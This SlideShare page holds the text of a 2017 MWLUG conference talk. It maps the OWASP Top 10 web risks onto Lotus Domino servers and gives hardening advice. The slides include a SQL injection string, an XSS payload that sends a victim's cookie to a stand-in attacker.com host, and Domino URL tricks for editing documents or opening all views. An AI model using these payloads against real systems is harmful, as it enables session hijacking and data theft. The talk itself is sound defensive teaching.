SlideShare a Scribd company logo
1 of 44
Download to read offline
MWLUG 2017
Moving Collaboration Forward
Can Domino Be Hacked?
Lessons We Can Learn From the
Security Community
Howard Greenberg
Andrew Pollack
MWLUG 2017
Moving Collaboration Forward
Our Amazing Sponsors
MWLUG 2017
Moving Collaboration Forward
Andrew Pollack
Northern Collaborative Technologies
• Administrator & Developer since version 2.0
• IBM Lotus Beacon Award Winner
• Services
– Security Review & Penetration Testing
– Site Performance & Security Reviews
– Expert Witness & Security Forensics
– Application Development
– Administrative Overhaul
• Products
– NCT Search
– NCT Compliance Search
– NCT Simple Sign On
– NCT SAML for Domino 7+
• Structural Firefighter
MWLUG 2017
Moving Collaboration Forward
Howard Greenberg
• Been doing Notes/Domino since 1993
– Developer, Admin, Consultant, Instructor
• Co-founded TLCC in 1998
– Self-paced courses for Notes/Domino and XPages
• Security Certifications
– Certified Information Systems Auditor (CISA)
– Certified Information Security Manager (CISM)
• Certified Flight Instructor (CFI)
MWLUG 2017
Moving Collaboration Forward
Session Goals
• Review the OWASP Top 10 Web Application
Security Issues
• Relate those to our Domino environments
HG
MWLUG 2017
Moving Collaboration Forward
Why do I care?
• I have a firewall, no one can touch my Domino
environment!
HG
MWLUG 2017
Moving Collaboration Forward
Reality
Vendors
Suppliers
Customers
Employees
HG
MWLUG 2017
Moving Collaboration Forward
Major Breaches
• Target – 70MM customer accounts
– Stole logins from the HVAC subcontractor
• Via phishing email, then malware got installed
– Once in, pivoted to registers, installed malware
• Captured credit card information, then uploaded to hackers
– Lesson learned, segment networks, encrypt sensitive
data
Did the Firewall help?
https://www.sans.org/reading-
room/whitepapers/casestudies/case-study-critical-controls-
prevented-target-breach-35412
HG
MWLUG 2017
Moving Collaboration Forward
OPM Breach
• Office of Personnel Management (US)
– Personal data on EVERY Federal employee
• Plus more...
• Phishing attack – got login data from a
contractor – put malware on admin server
• Lack of encryption on sensitive databases
https://www.wired.com/2016/10/inside-cyberattack-shocked-
us-government/
HG
MWLUG 2017
Moving Collaboration Forward
Who/What is OWASP
• “Open Web Application Security Project (OWASP) is a 501(c)(3)
worldwide not-for-profit charitable organization focused on
improving the security of software”
• Publishes a list of the 10 Most Critical Web Application Security
Risks – Widely Respected
– For each Risk it provides:
• A description
• Example vulnerabilities
• Example attacks
• Guidance on how to avoid
• References to OWASP and other related resource
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
HG
MWLUG 2017
Moving Collaboration Forward
Top 10 for 2017 (Release Candidate)
• A1-Injection
• A2-Broken Authentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Broken Access Control
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Insufficient Attack Protection
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with Known Vulnerabilities
• A10-Underprotected APIs
HG https://www.owasp.org/index.php/Top_10_2017-Top_10
MWLUG 2017
Moving Collaboration Forward
Sample of
Information
Published
Link to PDF
HG
MWLUG 2017
Moving Collaboration Forward
A1 - Injection
The best way to find out if an application is vulnerable to injection is to verify
that all use of interpreters clearly separates untrusted data from the
command or query..
Typically SQL injection, got any sql code in your apps (accessing relational
data)? like:
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
the attacker modifies the ‘id’ parameter value in her browser to send: ' or
'1'='1. For example:
http://example.com/app/accountView?id=‘ or '1'='1
This changes the meaning of both queries to return all the records from the
accounts table. More dangerous attacks could modify data or even invoke
stored procedures
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A1
• Got SQL code?
– Use SQL parameters
“SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'"
"SELECT * FROM accounts WHERE custID= ?”
– Scrub input
– use prepared statements
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A1
• Hack Domino urls
– Switch from openDocument to editDocument
http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9
B86441DFF85258154004A827A&action=openDocument
• Pivot to read all documents – open default view
http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
• Use zero as the view and open any document by
id
http://www.tlcc.com/mwlug/mwlug2017.nsf/0/
557d7b9b86441dff85258154004a827a?EditDocument
Fix - use proper reader/author names
Block view access with $$ViewTemplateDefault
HG
MWLUG 2017
Moving Collaboration Forward
A2-Broken Authentication and Session
Management - What is it?
• User authentication credentials aren’t properly protected
when stored using hashing or encryption.
• Credentials can be guessed or overwritten through weak
account management functions
• Session IDs are exposed in the URL
• Session IDs are vulnerable to session fixation attacks.
• Session IDs don’t timeout, or user sessions or
authentication tokens aren’t properly invalidated during
logout.
• Session IDs aren’t rotated after successful login.
• Passwords, session IDs, and other credentials are sent over
unencrypted connections.
AP
MWLUG 2017
Moving Collaboration Forward
A2-Protecting Stored Credentials
• Domino is fairly good at this if you let it
– Use Minimum Password Requirements
– Protect your Domino Directory
– Don’t store a password file “just in case”
– Use the “Fewer Name Variants” option
• Beware of SSO Solutions – Including SAML
– You may be turning over all authentication
controls to some other system!
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Weak Management Practices
• Beware of password recovery processes
– How do you verify the person requesting the
password reset is really the person who should
have it? This can also be used to deny service.
– Any web site that can send you your old password
when you request it should not be trusted
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Session IDs in the URL
• While Domino doesn’t generally do this, some
administrators do this to avoid creating
Domino users, or to give specific user content
within applications based on URLs
– E.G. Urls that contain specific invoice numbers or
trouble ticket ids to send users to specific
documents
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Session “Fixation” Attacks
• Can your stored authentication token be captured
an re-used in Domino?
– Spoiler Alert: Yes, it can – and quite easily
• In Session based authentication the session token
is stored in a cookie.
• Anyone who can create web pages on your server
can capture this using a bit of javascript.
– Other servers – including non-Domino servers within
your domain may be able to capture this cookie as
well
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Preventing Domino “Fixation”
attacks on your Domino Servers
• Code review applications
• Follow XSS prevention best practices
• Change the default cookie domain path in
your session ltpa token documents
AP
MWLUG 2017
Moving Collaboration Forward
A2 – Passwords, session IDs, on
unencrypted connections
• There should no longer be any reason to allow
unencrypted http connections at all. Sorry.
It’s 2017. Stop doing this.
AP
MWLUG 2017
Moving Collaboration Forward
A3 - Cross Site Scripting (XSS)
You are vulnerable to Server XSS if your server-side code uses user-supplied
input as part of the HTML output, and you don’t use context-sensitive
escaping to ensure it cannot run. If a web page uses JavaScript to dynamically
add attacker-controllable data to a page, you may have Client XSS. Ideally, you
would avoid sending attacker-controllable data to unsafe JavaScript APIs, but
escaping (and to a lesser extent) input validation can be used to make this
safe.
Example Attack Scenario
The application uses untrusted data in the construction of the following HTML
snippet without validation or escaping: (String) page += "<input
name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
This attack causes the victim’s session ID to be sent to the attacker’s website,
allowing the attacker to hijack the user’s current session.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerability – A3
• YES, any web application is!!!
• Any text input, especially rich text (converts to
link)
• Prevention
– Always sanitize any input
• Domino web – look for html tags, strip out
– Have to roll your own with LotusScript
– Note: CSJS is not an option!
• XPages have HTML Filters
HG
MWLUG 2017
Moving Collaboration Forward
XPages HTML Filters
• XPages has built-in filtering
• Have to turn on
– HTMLFilter – for output
– HTMLFilterIn – filters on saving
• Use acf as the option!
– Identity does nothing, empty kills everything
– Turn on for all rich text (server, app, or XPage)
xsp.richtext.default.htmlfilter=acf
HG
More Information!
MWLUG 2017
Moving Collaboration Forward
A4-Broken Access Control
• Not just ACL Settings – but includes them
– Maximum Internet Name & Password Access
– Anonymous & Default “No Access” on all database
you don’t expect web users to access
– Obscurity is not Security – (See App Dev Practices)
AP
MWLUG 2017
Moving Collaboration Forward
A5-Security Misconfiguration
• Don’t expose your operating system to the
internet.
• Turn off all services you don’t need
• Keep your Domino version fully up to date
– Tools like “Metasploit” know all about Domino
– Out of date servers can be hacked to a remote
command line in 30 seconds with menu driven
hacking tools
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Use Good HTTP Password
Management practices
• Assign HTTP Passwords even if you don’t use
them. This field will get filled in with garbage
if you do not.
– These are also used to attack your SMTP mail
handler
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Don’t Help the Hackers
• By default your server tells the world what
software you’re running.
It’s like you WANT to get hacked
AP
MWLUG 2017
Moving Collaboration Forward
A5 – Don’t Help the Hackers!
• HTTPDisableServerHeader=1
• Then Get Fancy! Add your own SERVER header
AP
MWLUG 2017
Moving Collaboration Forward
A5 - Set up SSL the right way
• Use TLS
• Use the right SSL settings
• Use a score check service to validate
AP
www.ssllabs.com/ssltest/index.html
MWLUG 2017
Moving Collaboration Forward
A5 – Domino Web Server Settings
May need to modify ciphers available
Disable_SSLV3=1
SSL_USE_CLIENT_CIPHER_ORDER=1
MWLUG 2017
Moving Collaboration Forward
A6- Sensitive Data Exposure
Am I vulnerable to Data Exposure? The first thing you have to
determine is which data is sensitive enough to require extra
protection. For example, passwords, credit card numbers, health
records, and personal information should be protected. For all such
data:
1. Is any of this data stored in clear text long term, including backups
of this data?
2. Is any of this data transmitted in clear text, internally or
externally? Internet traffic is especially dangerous.
3. Are any old / weak cryptographic algorithms used?
4. Are weak crypto keys generated, or is proper key management or
rotation missing?
5. Are any browser security directives or headers missing when
sensitive data is provided by / sent to the browser?
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerability – A6
Know your data, what is sensitive - RISK ANALYSIS!
• HTTPS should be turned on/forced for anything that may be
sensitive - protect data in motion
• Store data in encrypted fields protect data when sitting
– Notes encryption (field level), now in XPages in FP8!
• Use TLS 1.2 only, older encryption is vulnerable
– Turn off SSLV3
• Passwords in names.nsf
– setting to hash in better encrypted ways
• PCI - If your company takes credit cards, you are subject to
PCI
• PII - personal information, many rules for EU, states, etc.
HG
MWLUG 2017
Moving Collaboration Forward
A7 - Insufficient Attack Protection
Am I Vulnerable to Attack?
Detecting, responding to, and blocking attacks makes
applications dramatically harder to exploit yet almost no
applications or APIs have such protection. Critical
vulnerabilities in both custom code and components are also
discovered all the time, yet organizations frequently take
weeks or even months to roll out new defenses.
It should be very obvious if attack detection and response
isn’t in place. Simply try manual attacks or run a scanner
against the application. The application or API should identify
the attacks, block any viable attacks, and provide details on
the attacker and characteristics of the attack. If you can’t
quickly roll out virtual and/or actual patches when a critical
vulnerability is discovered, you are left exposed to attack.AP
MWLUG 2017
Moving Collaboration Forward
A7-Insufficient Attack Protection
• Is anyone monitoring your HTTP and SMTP
logs to look for attacks?
• Does your company have an IDS (Intrusion
Detection System)?
• Fail2Ban – Poor Linux Admin’s IDS
AP
MWLUG 2017
Moving Collaboration Forward
A8 - Cross-Site Request Forgery (CSRF)
Am I Vulnerable to CSRF?
To check whether an application is vulnerable, see if any links and
forms lack an unpredictable CSRF token. Without such a token,
attackers can forge malicious requests. An alternate defense is to
require the user to prove they intended to submit the request, such as
through reauthentication.
Focus on the links and forms that invoke state-changing functions,
since those are the most important CSRF targets. Multistep
transactions are not inherently immune. Also be aware that Server-
Side Request Forgery (SSRF) is also possible by tricking apps and APIs
into generating arbitrary HTTP requests.
Note that session cookies, source IP addresses, and other information
automatically sent by the browser don’t defend against CSRF since
they are included in the forged requests.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A8
• Prevent your content from being rendered in an
iframe or frameset that you did not generate.
• Domino web admin is vulnerable, turn off!
• Domino frameset
– DominoValidateFramesetSRC=1 - make sure the
content in the frameset comes from the same
database
https://www-
10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
• Set header - (note required for PCI compliance)
http://www-01.ibm.com/support/docview.wss?uid=swg21568598
HG
MWLUG 2017
Moving Collaboration Forward
A8 – X-Frame-Options Header
• Use the header “X-Frame-Options” to tell browsers not
to allow your page to be loaded in someone else’s
frame
– Frequently required by customer security audits
AP
MWLUG 2017
Moving Collaboration Forward
A9 - Using Components with Known
Vulnerabilities
• The challenge is to continuously monitor the components (both client-side
and server-side) you are using for new vulnerability reports. This
monitoring can be very difficult because vulnerability reports are not
standardized, making them hard to find and search for the details you
need (e.g., the exact component in a product family that has the
vulnerability). Worst of all, many vulnerabilities never get reported to
central clearinghouses like CVE and NVD.
• Determining if you are vulnerable requires searching these databases, as
well as keeping abreast of project mailing lists and announcements for
anything that might be a vulnerability. This process can be done manually,
or with automated tools. If a vulnerability in a component is discovered,
carefully evaluate whether you are actually vulnerable. Check to see if
your code uses the vulnerable part of the component and whether the
flaw could result in an impact you care about. Both checks can be difficult
to perform as vulnerability reports can be deliberately vague.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A9
• What software is your application using? Does
that have vulnerabilities?
– JS libraries like jQuery, Select2
– Java libraries (pdf, JSON, credit card...)
• What software is IBM using? (Example Java
libraries, Apache struts, etc.)
– Example: Apache Struts vulnerability
– Be sure to keep the Domino JVM updated
– Interim fixes
– Latest Fix PackHG
MWLUG 2017
Moving Collaboration Forward
A10 – Under-protected APIs
Am I Vulnerable to Attack?
Testing your APIs for vulnerabilities should be similar to testing the rest of
your application for vulnerabilities. All the different types of injection,
authentication, access control, encryption, configuration, and other issues
can exist in APIs just as in a traditional application.
However, because APIs are designed for use by programs (not humans) they
frequently lack a UI and also use complex protocols and complex data
structures. These factors can make security testing difficult. The use of
widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and
XML. Some frameworks like GWT and some RPC implementations use custom
formats. Some applications and APIs create their own protocol and data
formats, like WebSockets. The breadth and complexity of APIs make it difficult
to automate effective security testing, possibly leading to a false sense of
security.
Ultimately, knowing if your APIs are secure means carefully choosing a
strategy to test all defenses that matter.
HG
MWLUG 2017
Moving Collaboration Forward
Domino Vulnerabilities – A10
• Know what is turned on in your applications
and server.
– Is Domino DAS turned on?
• REST access to a database
– XPages REST, agents that serve up REST data, etc.
• Do a Code review, understand what data these
might serve up and how much access is given.
HG
MWLUG 2017
Moving Collaboration Forward
Closing
• Security is the responsibility of EVERYONE
• Especially those of us in IT, even without a
security job
– Developers have to ALWAYS design for security
– Admins have to ALWAYS plan and monitor to build
resilient systems
– Management has to provide the resources and
focus

More Related Content

What's hot

dominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxdominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxUlrich Krause
 
Implementing High Availability Caching with Memcached
Implementing High Availability Caching with MemcachedImplementing High Availability Caching with Memcached
Implementing High Availability Caching with MemcachedGear6
 
Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Slobodan Lohja
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSSam Bowne
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query LanguageTim Davis
 
Engage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsEngage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsGabriella Davis
 
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)Aurimas Mikalauskas
 
Real life challenges and configurations when implementing HCL Sametime v12.0....
Real life challenges and configurations when implementing HCL Sametime v12.0....Real life challenges and configurations when implementing HCL Sametime v12.0....
Real life challenges and configurations when implementing HCL Sametime v12.0....DNUG e.V.
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Inside PostgreSQL Shared Memory
Inside PostgreSQL Shared MemoryInside PostgreSQL Shared Memory
Inside PostgreSQL Shared MemoryEDB
 
IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceGabriella Davis
 
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...panagenda
 
What You Should Know About WebLogic Server 12c (12.2.1.2) #oow2015 #otntour2...
What You Should Know About WebLogic Server 12c (12.2.1.2)  #oow2015 #otntour2...What You Should Know About WebLogic Server 12c (12.2.1.2)  #oow2015 #otntour2...
What You Should Know About WebLogic Server 12c (12.2.1.2) #oow2015 #otntour2...Frank Munz
 
PostgreSQL Deep Internal
PostgreSQL Deep InternalPostgreSQL Deep Internal
PostgreSQL Deep InternalEXEM
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableDarren Duke
 
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessen
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessenAlles, was Sie ueber HCL Notes 64-Bit Clients wissen muessen
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessenpanagenda
 
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by Step
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by StepBootstrap 4 Tutorial PDF for Beginners - Learn Step by Step
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by StepBootstrap Creative
 
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesDomino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesChristoph Adler
 

What's hot (20)

dominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptxdominocamp2022.t1s1.dde.pptx
dominocamp2022.t1s1.dde.pptx
 
Implementing High Availability Caching with Memcached
Implementing High Availability Caching with MemcachedImplementing High Availability Caching with Memcached
Implementing High Availability Caching with Memcached
 
Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)Enable Domino Data Access Services (DAS)
Enable Domino Data Access Services (DAS)
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query Language
 
Engage2022 - Domino Admin Tips
Engage2022 - Domino Admin TipsEngage2022 - Domino Admin Tips
Engage2022 - Domino Admin Tips
 
Spnego configuration
Spnego configurationSpnego configuration
Spnego configuration
 
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
 
Real life challenges and configurations when implementing HCL Sametime v12.0....
Real life challenges and configurations when implementing HCL Sametime v12.0....Real life challenges and configurations when implementing HCL Sametime v12.0....
Real life challenges and configurations when implementing HCL Sametime v12.0....
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Inside PostgreSQL Shared Memory
Inside PostgreSQL Shared MemoryInside PostgreSQL Shared Memory
Inside PostgreSQL Shared Memory
 
IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and Performance
 
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...
Von A bis Z-itrix: Installieren Sie den stabilsten und schnellsten HCL Notes-...
 
What You Should Know About WebLogic Server 12c (12.2.1.2) #oow2015 #otntour2...
What You Should Know About WebLogic Server 12c (12.2.1.2)  #oow2015 #otntour2...What You Should Know About WebLogic Server 12c (12.2.1.2)  #oow2015 #otntour2...
What You Should Know About WebLogic Server 12c (12.2.1.2) #oow2015 #otntour2...
 
PostgreSQL Deep Internal
PostgreSQL Deep InternalPostgreSQL Deep Internal
PostgreSQL Deep Internal
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
 
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessen
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessenAlles, was Sie ueber HCL Notes 64-Bit Clients wissen muessen
Alles, was Sie ueber HCL Notes 64-Bit Clients wissen muessen
 
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by Step
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by StepBootstrap 4 Tutorial PDF for Beginners - Learn Step by Step
Bootstrap 4 Tutorial PDF for Beginners - Learn Step by Step
 
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesDomino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
 

Similar to Bp101-Can Domino Be Hacked

AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers Lewis Ardern
 
Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Benedek Menesi
 
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...panagenda
 
Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Benedek Menesi
 
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Meghan Weinreich
 
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenO365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenNCCOMMS
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application SecurityProxy Caches and Web Application Security
Proxy Caches and Web Application Security Tim Bass
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web AppsMark Garratt
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationTriNimbus
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 Natalia Kataoka
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtTechWell
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119lior mazor
 
Challenges In Modern Application
Challenges In Modern ApplicationChallenges In Modern Application
Challenges In Modern ApplicationRahul Kumar Gupta
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 

Similar to Bp101-Can Domino Be Hacked (20)

AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck Wrong slides! Please check description for correct deck
Wrong slides! Please check description for correct deck
 
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...Office 365 in today's digital threats landscape: attacks & remedies from a ha...
Office 365 in today's digital threats landscape: attacks & remedies from a ha...
 
Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...Office365 in today's digital threats landscape: attacks & remedies from a hac...
Office365 in today's digital threats landscape: attacks & remedies from a hac...
 
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
Don't Get Schooled: Performance and Security Tips from a Leading Education Sa...
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas VochtenO365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
O365Con18 - Hybrid SharePoint Deep Dive - Thomas Vochten
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application SecurityProxy Caches and Web Application Security
Proxy Caches and Web Application Security
 
Windows Azure Essentials V3
Windows Azure Essentials V3Windows Azure Essentials V3
Windows Azure Essentials V3
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Developing Secure Web Apps
Developing Secure Web AppsDeveloping Secure Web Apps
Developing Secure Web Apps
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical Debt
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
 
Challenges In Modern Application
Challenges In Modern ApplicationChallenges In Modern Application
